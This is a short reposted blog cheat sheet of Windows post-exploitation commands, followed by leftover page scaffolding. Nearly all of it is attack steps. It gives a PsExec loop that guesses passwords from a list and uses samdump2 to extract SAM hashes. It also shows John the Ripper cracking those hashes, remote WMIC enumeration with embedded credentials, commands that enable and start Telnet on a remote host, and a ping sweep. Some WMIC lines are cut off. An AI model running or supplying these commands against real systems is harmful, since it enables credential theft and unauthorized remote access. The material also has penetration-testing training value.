Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.

gathering System related information 
C:\>systeminfo 

Running Services
C:\>tasklist /svc 

Installed Services 
C:\>sc query state= all

Current environment settings
C:\>set

Find Username
C:\>set | find "USERNAME"

Find Domain
C:\>set | find "USERDOMAIN" 

Find Current User Information 
C:\>net user John 

Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators
 
Password Guessing with PsExec
Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt 
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula -u Jack -p %i "ipconfig" 2>nul && echo 

***************** %i *****************

Extract Hashes from the sam and system file with samdump2
:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist
# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information
C:\>ipconfig /displaydns

OS Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 
 
Starting telnet service 
C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep 
C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html
 


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值